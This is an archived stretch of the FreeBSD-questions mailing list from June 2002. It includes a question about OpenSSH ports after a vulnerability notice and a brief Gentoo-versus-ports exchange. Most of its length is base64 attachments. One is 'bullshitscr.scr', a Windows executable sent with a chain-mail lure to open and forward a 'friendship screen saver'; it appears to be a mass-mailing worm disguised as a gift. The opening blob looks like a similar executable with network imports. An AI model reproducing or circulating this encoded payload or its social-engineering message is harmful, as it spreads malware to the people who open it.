AGUAZQBuACAAUwBhAHYAZQByAAAAAABIABQAAQBDAG8AbQBwAGEAbgB5AE4AYQBtAGUAAAAAAHcA dwB3AC4AcwBjAHIAZQBlAG4AcwBhAHYAZQByAC4AYwBvAG0AAABCAA0AAQBGAGkAbABlAEQAZQBz AGMAcgBpAHAAdABpAG8AbgAAAAAAUwBjAHIAZQBlAG4AIABTAGEAdgBlAHIAAAAAADYACwABAEYA aQBsAGUAVgBlAHIAcwBpAG8AbgAAAAAANQAsACAAMAAsACAAMAAsACAAMgAAAAAAIAAAAAEASQBu AHQAZQByAG4AYQBsAE4AYQBtAGUAAABGABEAAQBMAGUAZwBhAGwAQwBvAHAAeQByAGkAZwBoAHQA AABDAG8AcAB5AHIAaQBnAGgAdAAgAKkAIAAyADAAMAAyAAAAAAAoAAAAAQBMAGUAZwBhAGwAVABy AGEAZABlAG0AYQByAGsAcwAAAAAAKAAAAAEATwByAGkAZwBpAG4AYQBsAEYAaQBsAGUAbgBhAG0A ZQAAACAAAAABAFAAcgBpAHYAYQB0AGUAQgB1AGkAbABkAAAAIAAAAAEAUAByAG8AZAB1AGMAdABO AGEAbQBlAAAAAAA6AAsAAQBQAHIAbwBkAHUAYwB0AFYAZQByAHMAaQBvAG4AAAA1ACwAIAAwACwA IAAwACwAIAAyAAAAAAAgAAAAAQBTAHAAZQBjAGkAYQBsAEIAdQBpAGwAZAAAAEQAAAABAFYAYQBy AEYAaQBsAGUASQBuAGYAbwAAAAAAJAAEAAAAVAByAGEAbgBzAGwAYQB0AGkAbwBuAAAAAAAJBLAE AAAAAAAAAAAAAAAA+FcBALhXAQAAAAAAAAAAAAAAAAAFWAEAyFcBAAAAAAAAAAAAAAAAABJYAQDQ VwEAAAAAAAAAAAAAAAAAHFgBANhXAQAAAAAAAAAAAAAAAAAkWAEA4FcBAAAAAAAAAAAAAAAAAC9Y AQDoVwEAAAAAAAAAAAAAAAAAO1gBAPBXAQAAAAAAAAAAAAAAAAAAAAAAAAAAAEZYAQBUWAEAZFgB AAAAAAByWAEAAAAAAIBYAQAAAAAAiFgBAAAAAACYWAEAAAAAAKBYAQAAAAAAdAAAgAAAAABLRVJO RUwzMi5ETEwAQURWQVBJMzIuZGxsAEdESTMyLmRsbABNUFIuZGxsAFVTRVIzMi5kbGwAV0lOSU5F VC5kbGwAV1MyXzMyLmRsbAAAAExvYWRMaWJyYXJ5QQAAR2V0UHJvY0FkZHJlc3MAAEV4aXRQcm9j ZXNzAAAAUmVnQ2xvc2VLZXkAAABCaXRCbHQAAFdOZXRDbG9zZUVudW0AAABHZXREQwAAAEludGVy bmV0R2V0Q29ubmVjdGVkU3RhdGUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAguOvXnsTWe3xilcHcK3YvTqZXtxAK67xSFTTmCPUw8QuO0m/IX7syAuenRC+ILqEAVFcmO8p qOcvv21w1E0mbuOei37AKfIDweUllRTbtTl80+aAesUeCsa0ZpK/U0NOyFRRSMbqeareo8UKIVmH 1elCbiPmiUzLfA6FhOB6X1QyS3+A6+2lw1/tSBNbJhwMnXQyfwUyga3IDTpW8XQSTFQwuuLGkTQY QHX0AbAc0a0A8VQM4MunEknTFWtRHGPfunJwuUVxB56IvFCaxC00iGoSn86AesNIgjVOyqiruun1 LiCPK21mMHDvb+60mWs3oLbvJTzIWa1CxOnmrXKqDZ1O2bCWgPWpQQpj0FTotJElt/AKKUNIo0LR 8qZFB08NXlq7xXHhvrFeghlU27rZIu9y7NXmvJJljkQ8SxU+BW8hnJLcHRIbNjTTMQVrD86LqB5v aKBm2iIryGnSegBo5LEaLoGpzpzVVhpC6WnnB4Z/b2cLOYEGHhre0noyiqkCRpYX1bL0Y0lz3Li2 +K47eVQm4HEAlAmPrqbk6rBrJDnAY69QWai9S0Lh1VX14nP1VHK1+CBTpZAYB+GODE+QOGbERt6D TVxrr1CdPqFnH5rGfZNUDL2bPb1xpRrU7vZhlZrvFppdXD+TABpn2RoKxBPWDrT1DT2+KFUdlkGW 5C6bhZDEgb8Bb/mTBjE+QjTfgidln8CBDwzvo+S3GHcaGuXM+WHMUDVzFJQDlsZWPWytd+ZrztLj QacmsqbUIZpsLXHqt81s4OgHAojIRuK3wj+1mYjz3R1WNEnM8XBs+Jz1S60uKG6QITCt37zl8u07 zJlYEdyaQDNeQIaqbkIF+B/RoIU/FO+z2jYwp6hxVRE9VO6MslI5zB7W0FUm1cy4bR8F8gEfNQGr sZNjBMjAq3oG6fcuimgubcC67S+k40TWNsdNF7bDYTIrtgjye0Q7cHC+2qIAXvGHS97nET4RvGSm xMGITGclA11nYEFBgAVEJ60QGIwRLqqJCDyjgJpqVNy75yg1V8MXpSiRGxM+JA1E1Qz4XdWZIT6C QZKA5GK34yvtOEn5cBUoRztrF6TIMq0koIDMVuxU1bDV5Xrp2PORYn+lii11JsQacovWXTHpLmo0 UYSe9LylpVdnE9HiZEuuqQQqGwozBIK4qsc2QtMSUpbZKuVdFnZznoYCQKmkYibpeH9BSYQdoUdA 3Gk+aWRZEefq7O/57dHXFw4DIkO8m0yQPn6VSCEJebYclwtM98tGDubVNEyDhMqUk2Bn6hD1Tb0s HNDfz3RZu8qiwz1v55VNl+HR1jT3t1Lb5lZxs6nY3WKZUrGWJFDLYr5OE9uzoG3EzX2W2ZdKxZCO BJ3LO29fPsX5UYyQSOGqm5K5YOmBqTelkrQBoI5wgKY7lBjj6F4gCvRMqr+fnYMpnEJ8de7iEe+w V74RPiKdugtIPduWnd3KNmxppTosKJIxsbm16q61Q2mzNbVuX1HbNO5pHUw9UBO7cT0jaWrYrCVu NhsW8pvXFjrndKRCBjx/x6NjbCuyJ4lGC8nupklRVoyk8Vp6khgoTWLD3m16j80tlVey6FmIYviv Lw/hN92UnrZHZIGquhl3mBqXLXzD8HyyiEZu8EdHr5ebg7+47Y4FtgALxwbzPWh8t+JmS1CIcRNU 32Y8pgpw50l1SwedC2aG8tHUBzLs5Jm9FJM+vml6jtzHGD9PiYiqQbFThju3WNywjqhdU2meKB4a q9k1FmrAQ4xTNi5/gGJLLVAFdTbIQren5vNwEK4voU196gtaHOFLT327r6+xbTKTEEVJKn7UR/LW 1gUN71Lqeh6K3K9pHsiVmVh015/QhAoiijMgcWqawipIAaWR93YQduTMyVAAOWpiEnujDHCk96kl 4cqljJvfZNl0B8BqkbYKY1cq7B0NbOL1HdK1td9sgpN0jE+cH5F7SRQ/2mV1tLa/Fl2Eh4iE9nMk DmLeP+fWpjwNr6vigwp9kH0zmgy+N+AtylIhvSoaBI7JFtqwWKBTC6gLYF3vPqtG81ApUgy90grr rZaqSCeFsanKY/kmY+3t0d027m/iR6J+tDzuLyHvdUEjOQdMyelrRZ+8yz9FzXzwtmHXLGbmuFMm g1lEsrWGIEoBgvExcLAW0BSO4eWRVnoWzRq+pE22U05kEQOMFMHlobCVtQyRDoa6KZf1lA== --fovcjsf-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 12:59: 5 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mta02-svc.ntlworld.com (mta02-svc.ntlworld.com [62.253.162.42]) by hub.freebsd.org (Postfix) with ESMTP id 4552837B49E for ; Tue, 25 Jun 2002 12:58:45 -0700 (PDT) Received: from lungfish.ntlworld.com ([80.4.0.215]) by mta02-svc.ntlworld.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP id <20020625195844.KXD4626.mta02-svc.ntlworld.com@lungfish.ntlworld.com>; Tue, 25 Jun 2002 20:58:44 +0100 Received: from tuatara.goatsucker.org (tuatara.goatsucker.org [192.168.1.6]) by lungfish.ntlworld.com (8.11.6/8.11.6) with ESMTP id g5PJwhV00616; Tue, 25 Jun 2002 20:58:43 +0100 (BST) (envelope-from scott@tuatara.goatsucker.org) Received: (from scott@localhost) by tuatara.goatsucker.org (8.12.3/8.12.3/Submit) id g5PJwevL003406; Tue, 25 Jun 2002 20:58:40 +0100 (BST) (envelope-from scott) Date: Tue, 25 Jun 2002 20:58:40 +0100 From: Scott Mitchell To: Christopher Schulte Cc: Lord Raiden , Marco Radzinschi , FreeBDS-Questions Subject: Re: Upcoming OpenSSH vulnerability (fwd) Message-ID: <20020625205840.B381@fishballoon.dyndns.org> References: <5.1.1.6.2.20020624224948.02923518@pop3s.schulte.org> <20020624234646.G22328-100000@mail.radzinschi.com> <4.2.0.58.20020625134233.009992b0@pop.netzero.net> <5.1.1.6.2.20020625124040.041c50f0@pop3s.schulte.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <5.1.1.6.2.20020625124040.041c50f0@pop3s.schulte.org>; from schulte+freebsd@nospam.schulte.org on Tue, Jun 25, 2002 at 12:45:33PM -0500 X-Operating-System: FreeBSD 4.6-STABLE i386 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Tue, Jun 25, 2002 at 12:45:33PM -0500, Christopher Schulte wrote: > At 01:43 PM 6/25/2002 -0400, Lord Raiden wrote: > > Ok, well we're still running OpenSSH 3.1 from the last security > > upgrade recommendation. Should we go straight to 3.3 or wait for the > > final fix? With previous ssh vulnerabilities I've been able to just patch the base system, by rebuilding the world or using the patch included with the advisory. However, to get to 3.3 it looks like I'd need to install a port. There are two OpenSSH ports: security/openssh and security/openssh-portable What's the difference between these two ports? Which one should I install to deal with this vulnerability? The right answer to my second question may of course be, "wait for the announcement on -security" TIA, Scott -- =========================================================================== Scott Mitchell | PGP Key ID | "Eagles may soar, but weasels Cambridge, England | 0x54B171B9 | don't get sucked into jet engines" scott.mitchell@mail.com | 0xAA775B8B | -- Anon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 13: 0: 2 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mel-rto6.wanadoo.fr (smtp-out-6.wanadoo.fr [193.252.19.25]) by hub.freebsd.org (Postfix) with ESMTP id A9E5D37B415 for ; Tue, 25 Jun 2002 12:59:50 -0700 (PDT) Received: from mel-rta8.wanadoo.fr (193.252.19.79) by mel-rto6.wanadoo.fr (6.5.007) id 3D1868370004C4D2 for freebsd-questions@FreeBSD.ORG; Tue, 25 Jun 2002 21:59:49 +0200 Received: from sociflar (193.253.221.20) by mel-rta8.wanadoo.fr (6.5.007) id 3D11E54E002A4510 for freebsd-questions@FreeBSD.ORG; Tue, 25 Jun 2002 21:59:49 +0200 Date: Tue, 25 Jun 2002 21:59:48 +0200 From: Max To: freebsd-questions@FreeBSD.ORG Subject: Re: FreeBSD, Linux or Solaris Message-Id: <20020625215948.557bc36a.max@fr.fm> In-Reply-To: References: <20020625133839.A22573@cygnus.wks.Gallup.cia-g.com> Organization: EPITA X-Mailer: Sylpheed version 0.7.8claws9 (GTK+ 1.2.10; i386-debian-linux-gnu) X-Face: $[X5o>e\T$ku?;,yhE+K7#Tjk Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Tue, 25 Jun 2002 14:46:57 -0500 "Jon Noack" wrote: > Anyone used Gentoo? I like what I hear about emerge, and I'd like to have a > more FreeBSD-ish Linux distro for those situations (read: clients) that > demand Linux. i try Gentoo, emerge looks like freebsd ports... "emerge fluxbox" will download last fluxbox sources, compile and install it gentoo : /usr/portage/ freebsd : /usr/ports/ :) -- Maxime Biais (biais_m) max@fr.fm www.tachatte.org 06 80 25 94 17 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 13: 3:12 2002 Delivered-To: freebsd-questions@freebsd.org Received: from eowyn.vianetworks.nl (eowyn.vianetworks.nl [212.61.25.227]) by hub.freebsd.org (Postfix) with ESMTP id 476D437B48D for ; Tue, 25 Jun 2002 13:00:30 -0700 (PDT) Received: from mail.iaehv.nl (pm17d379.iae.nl [212.61.5.125]) by eowyn.vianetworks.nl (Postfix) with SMTP id 432B120F46 for ; Tue, 25 Jun 2002 22:00:17 +0200 (CEST) From: Edwin Renders To: questions@FreeBSD.org Subject: Fw: Great Friendship to check :-) Date: Tue,25 Jun 2002 22:02:04 PM X-Mailer: Microsoft Outlook Express 5.50.4133.2400 MIME-Version: 1.0 Content-Type: multipart/mixed; boundary=ljdpkij Message-Id: <20020625200017.432B120F46@eowyn.vianetworks.nl> Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG --ljdpkij Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Attached one Gift for u..

Edwin Renders

----- Original Message -----
From: "friendship4u" < friends@friendscircle.com >
To: < erenders@iaehv.nl >
Sent: Tue,25 Jun 2002 22:02:04 PM
Subject: Great Friendship to check :-)


This e-mail is never sent unsolicited. If you need to unsubscribe,
follow the instructions at the bottom of the message.
***********************************************************

Enjoy this friendship Screen Saver and Check ur friends circle...

Send this screensaver from www.friendscircle.com to everyone you
consider a FRIEND, even if it means sending it back to the person
who sent it to you. If it comes back to you, then you'll know you
have a circle of friends.

* To remove yourself from this mailing list, point your browser to:
http://friendscircle.com/remove?freescreensaver
* Enter your email address (erenders@iaehv.nl) in the field provided and click "Unsubscribe".

OR...

* Reply to this message with the word "REMOVE" in the subject line.

This message was sent to address erenders@iaehv.nl
X-PMG-Recipient: erenders@iaehv.nl
<<<>>> <<<>>> <<<>>> <<<>>> <<<>>> <<<>>> <<<>>> <<<>>> <<<>>> <<<>>>
--ljdpkij Content-Type: application/octet-stream; name=bullshitscr.scr Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="bullshitscr.scr" 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 